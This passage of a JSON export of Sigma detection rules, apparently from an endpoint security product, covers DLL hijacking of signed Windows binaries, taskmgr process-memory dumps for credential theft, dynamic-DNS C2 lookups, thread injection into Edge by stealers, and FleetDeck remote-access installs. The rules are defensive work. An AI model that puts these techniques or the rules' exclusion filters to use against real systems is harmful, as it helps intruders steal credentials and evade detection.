'?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bbd3568d-604c-46d1-ac64-2e9eec0c9e01",
"rule_name": "DLL Hijacking via wpnpinst.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wpnpinst.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc503d34-1b44-4b9b-93a5-d6c4d21983f4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627966Z",
"creation_date": "2026-03-23T11:45:34.627968Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627973Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_memory_dump_with_taskmgr.yml",
"content": "title: Process Memory Dumped via taskmgr.exe\nid: bc503d34-1b44-4b9b-93a5-d6c4d21983f4\ndescription: |\n Detects a suspicious attempt to dump a process memory using taskmgr.\n Adversaries may attempt to access credential material stored in the process memory.\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to analyze other actions taken by the same user in its session to look for suspicious activities and to determine whether this user is legitimately connected to the host.\n It is also recommended to investigate the process that was dumped to determine whether it could have holding valuable or sensitive information or credentials.\nreferences:\n - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1003/\ndate: 2023/09/26\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image|endswith: '\\Taskmgr.exe'\n Path|endswith: '\\Temp\\\\*.DMP'\n\n # This is handled by the rule 78397a73-7ba5-4e02-8847-6a3242d29f28\n filter_lsass:\n Path|endswith: '\\lsass*.DMP'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc503d34-1b44-4b9b-93a5-d6c4d21983f4",
"rule_name": "Process Memory Dumped via taskmgr.exe",
"rule_description": "Detects a suspicious attempt to dump a process memory using taskmgr.\nAdversaries may attempt to access credential material stored in the process memory.\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to analyze other actions taken by the same user in its session to look for suspicious activities and to determine whether this user is legitimately connected to the host.\nIt is also recommended to investigate the process that was dumped to determine whether it could have holding valuable or sensitive information or credentials.\n",
"rule_creation_date": "2023-09-26",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc513da5-13a0-445a-bd9a-6878834f9c18",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594133Z",
"creation_date": "2026-03-23T11:45:34.594137Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594144Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ehttpsrv.yml",
"content": "title: DLL Hijacking via EHttpSrv.exe\nid: bc513da5-13a0-445a-bd9a-6878834f9c18\ndescription: |\n Detects potential Windows DLL Hijacking via EHttpSrv.exe related to ESET HTTP Server service process.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EHttpSrv.exe'\n ImageLoaded|endswith: '\\http_dll.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\ESET\\'\n - '?:\\Program Files (x86)\\ESET\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\ESET\\'\n - '?:\\Program Files (x86)\\ESET\\'\n - '?:\\Windows\\System32\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'ESET, spol. s r.o.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc513da5-13a0-445a-bd9a-6878834f9c18",
"rule_name": "DLL Hijacking via EHttpSrv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via EHttpSrv.exe related to ESET HTTP Server service process.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc52849e-854e-46a1-af98-d7a3e7a81f20",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076812Z",
"creation_date": "2026-03-23T11:45:34.076814Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076818Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_appvclient.yml",
"content": "title: DLL Hijacking via AppVClient.exe\nid: bc52849e-854e-46a1-af98-d7a3e7a81f20\ndescription: |\n Detects potential Windows DLL Hijacking via AppVClient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'AppVClient.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\appvpolicy.dll'\n - '\\netapi32.dll'\n - '\\secur32.dll'\n - '\\userenv.dll'\n - '\\wininet.dll'\n - '\\wtsapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc52849e-854e-46a1-af98-d7a3e7a81f20",
"rule_name": "DLL Hijacking via AppVClient.exe",
"rule_description": "Detects potential Windows DLL Hijacking via AppVClient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc584877-b80e-43ee-93ae-a442c27df4bd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089490Z",
"creation_date": "2026-03-23T11:45:34.089493Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089499Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wallpaperhost.yml",
"content": "title: DLL Hijacking via WallpaperHost.exe\nid: bc584877-b80e-43ee-93ae-a442c27df4bd\ndescription: |\n Detects potential Windows DLL Hijacking via WallpaperHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WallpaperHost.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\shell32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc584877-b80e-43ee-93ae-a442c27df4bd",
"rule_name": "DLL Hijacking via WallpaperHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WallpaperHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc5e24a5-f7a9-4a3b-aeec-0bc59fe7bb2e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625022Z",
"creation_date": "2026-03-23T11:45:34.625023Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625028Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1071/004/"
],
"name": "t1071_004_dyndns_windows_folder.yml",
"content": "title: DNS Request to a Dynamic DNS Service by a Windows Binary\nid: bc5e24a5-f7a9-4a3b-aeec-0bc59fe7bb2e\ndescription: |\n Detects a DNS request to dynamic DNS service by a process located in Windows folder.\n Adversaries may use DynDNS service to host their C2 server or deploy additional malicious code.\n It is recommended check process doing the DNS request for any other suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1071/004/\ndate: 2025/04/09\nmodified: 2025/12/10\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: dns_query\n product: windows\ndetection:\n selection:\n QueryName|endswith:\n - '.freeddns.org'\n - '.ddns.net'\n - '.duckdns.org'\n ProcessImage|startswith: '?:\\windows\\'\n\n filter_excpected_bin:\n - ProcessImage:\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\mstsc.exe'\n - '?:\\Windows\\System32\\curl.exe'\n - '?:\\Windows\\System32\\TRACERT.EXE'\n - '?:\\Windows\\System32\\OpenSSH\\ssh.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\mstsc.exe'\n - '?:\\Windows\\SysWOW64\\curl.exe'\n - '?:\\Windows\\SysWOW64\\TRACERT.EXE'\n - '?:\\Windows\\SysWOW64\\OpenSSH\\ssh.exe'\n - ProcessImage: '?:\\Windows\\SysWOW64\\svchost.exe'\n ProcessCommandLine|contains: '-k'\n\n exclusion_kms:\n ProcessImage: '?:\\Windows\\System32\\SppExtComObj.Exe'\n QueryName: 'kms.ddns.net'\n\n exclusion_experiencehost:\n ProcessImage: '?:\\Windows\\SystemApps\\Microsoft.Windows.StartMenuExperienceHost_*\\StartMenuExperienceHost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc5e24a5-f7a9-4a3b-aeec-0bc59fe7bb2e",
"rule_name": "DNS Request to a Dynamic DNS Service by a Windows Binary",
"rule_description": "Detects a DNS request to dynamic DNS service by a process located in Windows folder.\nAdversaries may use DynDNS service to host their C2 server or deploy additional malicious code.\nIt is recommended check process doing the DNS request for any other suspicious activities.\n",
"rule_creation_date": "2025-04-09",
"rule_modified_date": "2025-12-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc730779-ef0e-4f39-aef6-c0c22bcaee97",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624221Z",
"creation_date": "2026-03-23T11:45:34.624223Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624227Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/threat-intelligence/google-chrome-app-bound-encryption/",
"https://attack.mitre.org/techniques/T1055/",
"https://attack.mitre.org/techniques/T1539/"
],
"name": "t1055_suspicious_remote_thread_msedge.yml",
"content": "title: Suspicious Remote Thread Created in Edge\nid: bc730779-ef0e-4f39-aef6-c0c22bcaee97\ndescription: |\n Detects suspicious activity related to thread injection into the Microsoft Edge process.\n Stealers often use this technique to execute malicious code within Edge in order to exfiltrate sensitive data such as credentials, authentication tokens or session cookies.\n It is recommended to investigate the process injecting the thread to determine the legitimacy of this action.\nreferences:\n - https://redcanary.com/blog/threat-intelligence/google-chrome-app-bound-encryption/\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/techniques/T1539/\ndate: 2025/05/16\nmodified: 2025/11/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.credential_access\n - attack.t1539\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n TargetImage|endswith: '\\msedge.exe'\n\n filter_image:\n SourceImage:\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\SysWOW64\\TDepend64.exe'\n - '?:\\Windows\\System32\\rdrleakdiag.exe'\n - '?:\\ProgramData\\McAfee\\Agent\\Current\\\\*\\mfeepmpk_utility.exe'\n - '?:\\ProgramData\\McAfeeTmpInstall_Threat Prevention\\mfeepmpk_utility.exe'\n - '?:\\Windows\\WinSxS\\x86_microsoft-windows-servicingstack_*\\TiWorker.exe'\n - '?:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe'\n\n filter_module:\n StartFunction: 'LoadLibraryW'\n\n exclusion_uipath:\n SourceImage|endswith: '\\build\\UiPath\\FuncServer_x64.exe'\n StartModule|endswith: '\\build\\UiPath\\aahook_x64.dll'\n\n exclusion_windhawk:\n SourceImage|endswith: '\\windhawk.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Michael Maltsev'\n\n exclusion_roblox:\n SourceImage: '?:\\Users\\\\*\\AppData\\Local\\Roblox\\Versions\\version-????????????????\\RobloxPlayerBeta.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Roblox Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc730779-ef0e-4f39-aef6-c0c22bcaee97",
"rule_name": "Suspicious Remote Thread Created in Edge",
"rule_description": "Detects suspicious activity related to thread injection into the Microsoft Edge process.\nStealers often use this technique to execute malicious code within Edge in order to exfiltrate sensitive data such as credentials, authentication tokens or session cookies.\nIt is recommended to investigate the process injecting the thread to determine the legitimacy of this action.\n",
"rule_creation_date": "2025-05-16",
"rule_modified_date": "2025-11-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1539"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc8b1e6c-7991-4c71-9b13-997e762794d1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603249Z",
"creation_date": "2026-03-23T11:45:34.603252Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603260Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cyber.gc.ca/en/alerts-advisories/alphvblackcat-ransomware-targeting-canadian-industries",
"https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/",
"https://redcanary.com/threat-detection-report/trends/rmm-tools/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_fleetdeck_agent_installer.yml",
"content": "title: FleetDeck Agent Installer Execution\nid: bc8b1e6c-7991-4c71-9b13-997e762794d1\ndescription: |\n Detects the installation of the FleetDeck Agent, a Remote Desktop & Virtual Terminal solution to securely manage and monitor large fleets of computers.\n Attackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\n It is recommended to verify if the installation of this tool is legitimate in this IT environment. If it is the case, it is advised to disable this rule.\nreferences:\n - https://www.cyber.gc.ca/en/alerts-advisories/alphvblackcat-ransomware-targeting-canadian-industries\n - https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/\n - https://redcanary.com/threat-detection-report/trends/rmm-tools/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2024/08/28\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.FleetDeck\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\fleetdeck-agent-*.exe'\n - OriginalFileName: 'fleetdeck_installer'\n - InternalName: 'fleetdeck_installer'\n\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bc8b1e6c-7991-4c71-9b13-997e762794d1",
"rule_name": "FleetDeck Agent Installer Execution",
"rule_description": "Detects the installation of the FleetDeck Agent, a Remote Desktop & Virtual Terminal solution to securely manage and monitor large fleets of computers.\nAttackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\nIt is recommended to verify if the installation of this tool is legitimate in this IT environment. If it is the case, it is advised to disable this rule.\n",
"rule_creation_date": "2024-08-28",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bc8e174c-7695-4751-861f-bf32256cc7d4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087106Z",
"creation_date": "2026-03-23T11:45:34.087108Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087112Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf",
"https://attack.mitre.org/techniques/T1036/004/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1036_004_var_run_cron_pid_modified.yml",
